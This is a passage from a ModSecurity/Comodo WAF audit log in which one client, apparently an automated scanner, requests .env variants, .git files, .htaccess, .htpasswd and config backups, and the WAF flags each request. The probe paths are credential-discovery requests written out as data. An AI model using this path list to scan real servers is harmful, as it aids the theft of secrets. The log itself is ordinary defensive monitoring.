p2=1193, p3=18, p4=24, p5=58, sr=109, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c0b74626-Z-- --ab144f0b-A-- [17/Jun/2025:05:12:51.405412 +0530] aFCr-4oVQnPDyHnl9oPTogAAAAY 185.177.72.204 46490 127.0.0.1 7080 --ab144f0b-B-- GET /conf/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --ab144f0b-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --ab144f0b-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/conf/.env"] [unique_id "aFCr-4oVQnPDyHnl9oPTogAAAAY"] Stopwatch: 1750117371402344 3113 (- - -) Stopwatch2: 1750117371402344 3113; combined=1909, p1=362, p2=1448, p3=20, p4=26, p5=52, sr=87, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ab144f0b-Z-- --1a84887c-A-- [17/Jun/2025:05:12:51.515083 +0530] aFCr-wrsPejRtmHkrKLggAAAAAE 185.177.72.204 46500 127.0.0.1 7080 --1a84887c-B-- GET /config.bak HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --1a84887c-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --1a84887c-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/config.bak"] [unique_id "aFCr-wrsPejRtmHkrKLggAAAAAE"] Stopwatch: 1750117371512606 2518 (- - -) Stopwatch2: 1750117371512606 2518; combined=1603, p1=292, p2=1221, p3=18, p4=23, p5=49, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1a84887c-Z-- --6632be08-A-- [17/Jun/2025:05:12:52.066839 +0530] aFCr_ArsPejRtmHkrKLggQAAAAE 185.177.72.204 46536 127.0.0.1 7080 --6632be08-B-- GET /config.old HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --6632be08-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --6632be08-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/config.old"] [unique_id "aFCr_ArsPejRtmHkrKLggQAAAAE"] Stopwatch: 1750117372063759 3123 (- - -) Stopwatch2: 1750117372063759 3123; combined=1917, p1=328, p2=1484, p3=21, p4=28, p5=56, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6632be08-Z-- --3c61d233-A-- [17/Jun/2025:05:12:52.288190 +0530] aFCr_JVkCcfT-Z8NQYzE8wAAAAc 185.177.72.204 46554 127.0.0.1 7080 --3c61d233-B-- GET /config.php.bak HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --3c61d233-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --3c61d233-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".php.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".php.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/config.php.bak"] [unique_id "aFCr_JVkCcfT-Z8NQYzE8wAAAAc"] Stopwatch: 1750117372284994 3255 (- - -) Stopwatch2: 1750117372284994 3255; combined=2022, p1=341, p2=1556, p3=23, p4=26, p5=76, sr=103, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3c61d233-Z-- --8810156e-A-- [17/Jun/2025:05:12:52.399366 +0530] aFCr_NyZ4SMykfn97vy3dwAAAAs 185.177.72.204 46568 127.0.0.1 7080 --8810156e-B-- GET /config/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --8810156e-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --8810156e-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/config/.env"] [unique_id "aFCr_NyZ4SMykfn97vy3dwAAAAs"] Stopwatch: 1750117372396134 3276 (- - -) Stopwatch2: 1750117372396134 3276; combined=2004, p1=446, p2=1461, p3=18, p4=27, p5=52, sr=139, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --8810156e-Z-- --1b74f47a-A-- [17/Jun/2025:05:12:52.509892 +0530] aFCr_IoVQnPDyHnl9oPTpAAAAAY 185.177.72.204 46574 127.0.0.1 7080 --1b74f47a-B-- GET /config/.env.bak HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --1b74f47a-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --1b74f47a-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".env.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/config/.env.bak"] [unique_id "aFCr_IoVQnPDyHnl9oPTpAAAAAY"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".env.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/config/.env.bak"] [unique_id "aFCr_IoVQnPDyHnl9oPTpAAAAAY"] Stopwatch: 1750117372506689 3255 (- - -) Stopwatch2: 1750117372506689 3255; combined=2012, p1=486, p2=1412, p3=17, p4=23, p5=74, sr=138, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1b74f47a-Z-- --96698b49-A-- [17/Jun/2025:05:12:52.619776 +0530] aFCr_ArsPejRtmHkrKLgggAAAAE 185.177.72.204 46582 127.0.0.1 7080 --96698b49-B-- GET /config/.env.local HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --96698b49-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --96698b49-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/config/.env.local"] [unique_id "aFCr_ArsPejRtmHkrKLgggAAAAE"] Stopwatch: 1750117372617002 2817 (- - -) Stopwatch2: 1750117372617002 2817; combined=1657, p1=393, p2=1174, p3=17, p4=23, p5=50, sr=102, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --96698b49-Z-- --1fff1966-A-- [17/Jun/2025:05:12:52.729766 +0530] aFCr_OTJOk1gXj_qIh4X5AAAAAQ 185.177.72.204 46586 127.0.0.1 7080 --1fff1966-B-- GET /config/.env.old HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --1fff1966-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --1fff1966-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".env.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/config/.env.old"] [unique_id "aFCr_OTJOk1gXj_qIh4X5AAAAAQ"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".env.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/config/.env.old"] [unique_id "aFCr_OTJOk1gXj_qIh4X5AAAAAQ"] Stopwatch: 1750117372726883 2924 (- - -) Stopwatch2: 1750117372726883 2924; combined=1743, p1=391, p2=1245, p3=17, p4=23, p5=67, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1fff1966-Z-- --df61370e-A-- [17/Jun/2025:05:12:52.839704 +0530] aFCr_FJfblPUQiSn5r2RmAAAAAA 185.177.72.204 46596 127.0.0.1 7080 --df61370e-B-- GET /config/.env.save HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --df61370e-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --df61370e-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/config/.env.save"] [unique_id "aFCr_FJfblPUQiSn5r2RmAAAAAA"] Stopwatch: 1750117372836899 2848 (- - -) Stopwatch2: 1750117372836899 2848; combined=1605, p1=352, p2=1163, p3=18, p4=22, p5=50, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --df61370e-Z-- --0188d005-A-- [17/Jun/2025:05:12:52.949814 +0530] aFCr_JVkCcfT-Z8NQYzE9AAAAAc 185.177.72.204 46610 127.0.0.1 7080 --0188d005-B-- GET /config/.env~ HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --0188d005-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --0188d005-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/config/.env~"] [unique_id "aFCr_JVkCcfT-Z8NQYzE9AAAAAc"] Stopwatch: 1750117372946881 2987 (- - -) Stopwatch2: 1750117372946881 2987; combined=1720, p1=378, p2=1244, p3=18, p4=23, p5=57, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0188d005-Z-- --8ce6ee7e-A-- [17/Jun/2025:05:12:53.060587 +0530] aFCr_QJ4p5Cdblnjra535QAAAAI 185.177.72.204 46626 127.0.0.1 7080 --8ce6ee7e-B-- GET /config/.git/ HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --8ce6ee7e-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --8ce6ee7e-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/config/.git/"] [unique_id "aFCr_QJ4p5Cdblnjra535QAAAAI"] Stopwatch: 1750117373056988 3661 (- - -) Stopwatch2: 1750117373056988 3661; combined=2275, p1=501, p2=1583, p3=26, p4=95, p5=70, sr=122, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --8ce6ee7e-Z-- --9dde7534-A-- [17/Jun/2025:05:12:53.171027 +0530] aFCr_YoVQnPDyHnl9oPTpQAAAAY 185.177.72.204 46640 127.0.0.1 7080 --9dde7534-B-- GET /config/.git/HEAD HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --9dde7534-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --9dde7534-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/config/.git/HEAD"] [unique_id "aFCr_YoVQnPDyHnl9oPTpQAAAAY"] Stopwatch: 1750117373168211 2859 (- - -) Stopwatch2: 1750117373168211 2859; combined=1674, p1=390, p2=1194, p3=20, p4=20, p5=50, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9dde7534-Z-- --dc95c214-A-- [17/Jun/2025:05:12:53.281158 +0530] aFCr_QrsPejRtmHkrKLggwAAAAE 185.177.72.204 46654 127.0.0.1 7080 --dc95c214-B-- GET /config/.git/config HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --dc95c214-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --dc95c214-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/config/.git/config"] [unique_id "aFCr_QrsPejRtmHkrKLggwAAAAE"] Stopwatch: 1750117373278213 2988 (- - -) Stopwatch2: 1750117373278213 2988; combined=1833, p1=359, p2=1379, p3=23, p4=24, p5=48, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --dc95c214-Z-- --aa53e228-A-- [17/Jun/2025:05:12:53.390877 +0530] aFCr_VJfblPUQiSn5r2RmQAAAAA 185.177.72.204 46658 127.0.0.1 7080 --aa53e228-B-- GET /config/.git/logs/HEAD HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --aa53e228-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --aa53e228-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/config/.git/logs/HEAD"] [unique_id "aFCr_VJfblPUQiSn5r2RmQAAAAA"] Stopwatch: 1750117373388374 2546 (- - -) Stopwatch2: 1750117373388374 2546; combined=1557, p1=393, p2=1079, p3=20, p4=20, p5=45, sr=102, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --aa53e228-Z-- --152e410e-A-- [17/Jun/2025:05:12:53.500689 +0530] aFCr_dyZ4SMykfn97vy3eQAAAAs 185.177.72.204 46664 127.0.0.1 7080 --152e410e-B-- GET /config/.gitignore HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --152e410e-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --152e410e-H-- Message: Warning. Matched phrase "/.gitignore" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.gitignore" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/config/.gitignore"] [unique_id "aFCr_dyZ4SMykfn97vy3eQAAAAs"] Stopwatch: 1750117373497996 2746 (- - -) Stopwatch2: 1750117373497996 2746; combined=1614, p1=337, p2=1198, p3=13, p4=20, p5=46, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --152e410e-Z-- --aeb06643-A-- [17/Jun/2025:05:12:53.610730 +0530] aFCr_YoVQnPDyHnl9oPTpgAAAAY 185.177.72.204 46680 127.0.0.1 7080 --aeb06643-B-- GET /config/.htaccess HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --aeb06643-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --aeb06643-H-- Message: Warning. Matched phrase ".htaccess" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase ".htaccess" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/config/.htaccess"] [unique_id "aFCr_YoVQnPDyHnl9oPTpgAAAAY"] Stopwatch: 1750117373607738 3036 (- - -) Stopwatch2: 1750117373607738 3036; combined=1899, p1=388, p2=1403, p3=20, p4=27, p5=61, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --aeb06643-Z-- --1b76de7e-A-- [17/Jun/2025:05:12:53.722752 +0530] aFCr_VJfblPUQiSn5r2RmgAAAAA 185.177.72.204 46688 127.0.0.1 7080 --1b76de7e-B-- GET /config/.htpasswd HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --1b76de7e-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --1b76de7e-H-- Message: Warning. Matched phrase ".htpasswd" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase ".htpasswd" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] 